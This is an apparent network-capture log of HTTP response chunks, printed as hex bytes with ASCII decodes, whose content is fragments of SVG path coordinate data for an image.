                                                                                                                                                                              2023-09-15 05:27:26 UTC692INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                              Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                              2023-09-15 05:27:26 UTC708INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                              Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                              2023-09-15 05:27:26 UTC724INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                              Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                              2023-09-15 05:27:26 UTC740INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                              Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                              2023-09-15 05:27:26 UTC756INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                              Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                              2023-09-15 05:27:26 UTC772INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                              Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                              2023-09-15 05:27:26 UTC788INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                              Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                              2023-09-15 05:27:26 UTC804INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                              Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                              2023-09-15 05:27:26 UTC820INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                              Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                              2023-09-15 05:27:26 UTC836INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                              Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                              2023-09-15 05:27:26 UTC852INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                              Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                              2023-09-15 05:27:26 UTC868INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                              2023-09-15 05:27:26 UTC884INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                              Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                              2023-09-15 05:27:26 UTC900INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                              Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                              2023-09-15 05:27:26 UTC916INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                              Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                              2023-09-15 05:27:26 UTC932INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                              2023-09-15 05:27:26 UTC948INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                              Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
